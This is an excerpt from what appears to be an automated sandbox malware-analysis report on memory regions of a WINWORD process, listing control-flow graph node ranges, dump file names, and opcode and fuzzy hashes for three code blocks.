      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 38 6876503-6876591 39 6876594-6876598 38->39 40 687659a-68765ee 38->40 39->40 41 68765f2-68765f6 40->41
      Memory Dump Source
      • Source File: 00000000.00000002.1038037434.0000000006874000.00000040.00000001.00020000.00000000.sdmp, Offset: 06874000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_6874000_WINWORD.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 03c3722f21f0ae4b7b86c2702ec4959160f750882e86516fc6d6c7d83a3389e4
      • Instruction ID: 2e727005fc688ef1c901d6b82b68e4f182385e298f525b421432b4a041588ac5
      • Opcode Fuzzy Hash: 03c3722f21f0ae4b7b86c2702ec4959160f750882e86516fc6d6c7d83a3389e4
      • Instruction Fuzzy Hash: 98311F6148E7C54FD70397B8AC716A07FB09E17214B1A05EBD8D8CF1A3E118589AD763
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 42 6875cf3-6875d30 43 6875d33-6875d37 42->43
      Memory Dump Source
      • Source File: 00000000.00000002.1038037434.0000000006874000.00000040.00000001.00020000.00000000.sdmp, Offset: 06874000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_6874000_WINWORD.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 924d75177e71b3a031391f0901966a14699fbc8d99cee33caa59ae527f761cd6
      • Instruction ID: f62433303735956535a6053a499df01d8c4bf8fed01c7b7e19dac608ea897904
      • Opcode Fuzzy Hash: 924d75177e71b3a031391f0901966a14699fbc8d99cee33caa59ae527f761cd6
      • Instruction Fuzzy Hash: 24E04F3510DB884FDB6AAB28E851B507BA0EF6A300F1441DAE88CC72D3E575C8898787
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 56 6874002-68740a8 57 68740da-68741c8 56->57 58 68740aa-68740d8 56->58 59 68741ce-68741e8 57->59 60 68741ca-68741cc 57->60 58->57 61 68741ea-6874218 59->61 60->59 62 6874266-687437d 61->62 63 687421a-687425c 61->63 63->61 64 687425e-6874264 63->64 64->62
      Memory Dump Source
      • Source File: 00000000.00000002.1038037434.0000000006874000.00000040.00000001.00020000.00000000.sdmp, Offset: 06874000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_6874000_WINWORD.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 77be099cc6ad5c12d9da44c604ec9f6810dc134284a586a4241c37344f5932c1
      • Instruction ID: ffec79f49e5ec4a416cd89f34bc7c21221069dda7253d7684c62d3dc38745107
      • Opcode Fuzzy Hash: 77be099cc6ad5c12d9da44c604ec9f6810dc134284a586a4241c37344f5932c1
      • Instruction Fuzzy Hash: A4E14D6004E7C64FC3138B384C75682BFB0AE53214B5E89DBC8C6CF9A3D658599AD763
      Uniqueness

      Uniqueness Score: -1.00%